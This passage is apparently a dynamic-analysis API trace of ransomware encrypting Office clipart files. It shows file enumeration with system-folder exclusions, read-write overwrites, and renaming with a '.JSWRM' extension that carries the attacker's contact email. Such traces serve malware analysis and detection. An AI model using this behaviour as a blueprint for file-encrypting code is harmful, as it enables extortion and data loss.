cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0092.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0092.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0092.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0092.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.237] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01473_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01473_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0092.237] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x349c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01474_.WMF", cAlternateFileName="")) returned 1 [0092.237] lstrcmpiW (lpString1="NA01474_.WMF", lpString2=".") returned 1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="..") returned 1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="...") returned 1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="windows") returned -1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="recovery") returned -1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="perflogs") returned -1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="documents and settings") returned 1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="system volume information") returned -1 [0092.238] lstrcmpiW (lpString1="NA01474_.WMF", lpString2="msocache") returned 1 [0092.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01474_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01474_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01474_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01474_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01474_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01474_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01474_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.239] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13468) returned 1 [0092.239] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3490) returned 0x24d210 [0092.239] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3490, lpOverlapped=0x0) returned 1 [0092.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.241] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3490, lpOverlapped=0x0) returned 1 [0092.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.241] CloseHandle (hObject=0x314) returned 1 [0092.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0092.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0092.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01474_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01474_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.250] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01627_.WMF", cAlternateFileName="")) returned 1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2=".") returned 1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="..") returned 1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="...") returned 1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="windows") returned -1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="recovery") returned -1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="perflogs") returned -1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="documents and settings") returned 1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="system volume information") returned -1 [0092.250] lstrcmpiW (lpString1="NA01627_.WMF", lpString2="msocache") returned 1 [0092.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01627_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01627_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01627_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01627_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01627_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01627_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01627_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.252] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3296) returned 1 [0092.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xce0) returned 0x23fc98 [0092.252] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xce0, lpOverlapped=0x0) returned 1 [0092.253] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.254] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xce0, lpOverlapped=0x0) returned 1 [0092.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.254] CloseHandle (hObject=0x314) returned 1 [0092.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0092.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0092.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0092.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0092.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0092.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.254] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01627_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01627_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0092.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.255] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61cf5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf61cf5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb9e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01680_.WMF", cAlternateFileName="")) returned 1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2=".") returned 1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="..") returned 1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="...") returned 1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="windows") returned -1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="recovery") returned -1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="perflogs") returned -1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="documents and settings") returned 1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="system volume information") returned -1 [0092.255] lstrcmpiW (lpString1="NA01680_.WMF", lpString2="msocache") returned 1 [0092.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0092.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01680_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01680_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01680_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0092.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0092.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01680_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01680_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01680_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0092.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01680_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.257] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2974) returned 1 [0092.257] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb90) returned 0x23fc98 [0092.257] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb90, lpOverlapped=0x0) returned 1 [0092.258] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.258] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb90, lpOverlapped=0x0) returned 1 [0092.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.258] CloseHandle (hObject=0x314) returned 1 [0092.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0092.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0092.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0092.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0092.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0092.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.259] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01680_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01680_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0092.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.260] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61cf5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf61cf5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, 